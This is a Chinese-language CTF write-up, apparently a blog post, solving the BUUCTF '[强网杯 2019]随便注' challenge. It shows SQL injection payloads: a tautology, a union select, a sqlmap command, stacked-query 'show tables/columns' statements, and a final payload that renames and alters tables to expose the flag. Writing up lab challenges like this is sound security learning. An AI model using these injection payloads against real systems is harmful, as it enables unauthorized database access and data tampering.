zoukankan      html  css  js  c++  java
  • BUUCTF-[强网杯 2019]随便注

    随便注?

    那么我就不客气了,先试试返回真值:

    ' or 1=1#

    返回了所有查询内容,共三条,order by猜测字段长,发现为2,验证了一下:

    日常操作:

    ' or 1=1 union select 1,table_name,3 from information_schema.tables#

    匹配关键字?百度一下发现是被过滤了,没法使用上面的语句进行查询

    手注总没有自动好用,拿去sqlmap跑一下,注出库名:supersqli

    C:Program FilesPython38sqlmap>python sqlmap.py -u "http://0232d970-6f71-4069-8a93-55f18f3a06d7.node3.buuoj.cn/?inject=1" --forms --batch --dbs

    但是想看表的时候,返回库里面不存在表,无论怎么都注不出来

    无奈去看大佬的WP,存在过滤,要用sql堆叠注入

    上面注出了supersqli所以这里只去看这个库

    1';show tables from supersqli#

    1';show columns from `1919810931114514`#

    找到flag在哪里了

    但是不会查看,去看了别人的方法:

    payload:

    0';rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc  words;#

    参考资料:https://www.jianshu.com/p/6c6a44517dd7

    一知半解的样子,虽然网上答案很多,但是基本上模板都是那几个,这个大佬的讲解还挺不错的

    [Sign]做不出ctf题的时候很痛苦,你只能眼睁睁看着其他人领先你
  • 相关阅读:
    ABP
    妖道角
    检测空值,以及会不会出现mapping类型不一致的问题
    wcf服务契约代理链
    wcf服务契约继承
    win64+anaconda+xgboost(转)
    python中迭代问题
    ROC曲线和AUC值(转)
    python中split()和split(' ')的区别
    str和repr的区别(转)
  • 原文地址:https://www.cnblogs.com/echoDetected/p/12353310.html
Copyright © 2011-2022 走看看